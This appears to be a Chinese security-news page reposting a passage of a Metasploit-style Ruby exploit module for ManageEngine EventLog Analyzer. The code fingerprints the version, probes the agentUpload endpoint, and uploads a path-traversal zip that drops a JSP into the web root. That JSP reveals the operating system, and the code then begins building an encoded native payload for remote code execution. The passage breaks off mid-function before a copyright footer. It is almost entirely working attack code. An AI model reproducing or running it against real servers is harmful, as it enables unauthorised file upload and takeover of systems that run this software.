ManageEngine EventLog Analyzer多个安全漏洞(2)


  def get_version
    res = send_request_cgi({
      'uri'    => normalize_uri("event/index3.do"),
      'method' => 'GET'
    })

if res and res.code == 200
      if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
        return $1
      end
    end

return "0"
  end


  def check
    version = get_version
    if version >= "7" and version <= "9"
      # version 7 to < 8.1 detection
      res = send_request_cgi({
        'uri'    => normalize_uri("event/agentUpload"),
        'method' => 'GET'
      })
      if res and res.code == 405
        return Exploit::CheckCode::Appears
      end

# version 8.1+ detection
      res = send_request_cgi({
        'uri'    => normalize_uri("agentUpload"),
        'method' => 'GET'
      })
      if res and res.code == 405 and version == 8
        return Exploit::CheckCode::Appears
      else
        # We can't be sure that it is vulnerable in version 9
        return Exploit::CheckCode::Detected
      end

else
      return Exploit::CheckCode::Safe
    end
  end


  def create_zip_and_upload(payload, target_path, is_payload = true)
    # Zipping with CM_STORE to avoid errors decompressing the zip
    # in the Java vulnerable application
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file(target_path, payload)

post_data = Rex::MIME::Message.new
    post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")

data = post_data.to_s

if is_payload
      print_status("#{peer} - Uploading payload...")
    end
    res = send_request_cgi({
      'uri'    => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
      'method' => 'POST',
      'data'  => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })

if res and res.code == 200 and res.body.empty?
      if is_payload
        print_status("#{peer} - Payload uploaded successfully")
      end
      register_files_for_cleanup(target_path.gsub("../../", "../"))
      return true
    else
      return false
    end
  end


  def pick_target
    return target if target.name != 'Automatic'

print_status("#{peer} - Determining target")

version = get_version

if version == "7"
      return targets[1]
    end

os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    target_dir = "../../webapps/event/"
    if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
      if version == "8"
        # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
        return targets[1]
      end
      return nil
    end

res = send_request_cgi({
      'uri'    => normalize_uri(jsp_name),
      'method' => 'GET'
    })

if res and res.code == 200
      if res.body.to_s =~ /Windows/
        return targets[2]
      else
        # assuming Linux
        return targets[3]
      end
    end

return nil
  end


  def generate_jsp_payload
    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
    exe = generate_payload_exe(opts)
    base64_exe = Rex::Text.encode_base64(exe)

native_payload_name = rand_text_alpha(rand(6)+3)
    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/4c0883564f5f59491b2fa76f3b4b5fc3.html